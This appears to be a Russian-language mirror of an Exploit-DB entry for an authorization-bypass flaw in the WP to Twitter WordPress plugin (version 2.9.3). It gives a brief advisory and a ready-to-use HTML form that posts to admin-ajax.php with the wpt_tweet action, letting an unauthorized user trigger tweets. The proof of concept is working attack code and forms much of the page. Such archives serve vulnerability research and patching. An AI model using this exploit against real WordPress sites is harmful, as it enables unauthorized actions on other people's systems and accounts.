- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39302
- Проверка EDB
-
- Пройдено
- Автор
- VOXEL@NIGHT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2014-09-08
WordPress Plugin WP to Twitter - Authentication Bypass
HTML:
source: https://www.securityfocus.com/bid/69741/info
WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.
<html><body>
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
action:<input name="action" value="wpt_tweet"><br>
tweet action:<input name="tweet_action" value="tweet"><br>
tweet text: <input value="" name="tweet_text"><br>
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
tweet post id: <input value="1" name="tweet_post_id"><br>
<input type="submit" value="Submit">
</form>
</body></html>- Источник
- www.exploit-db.com
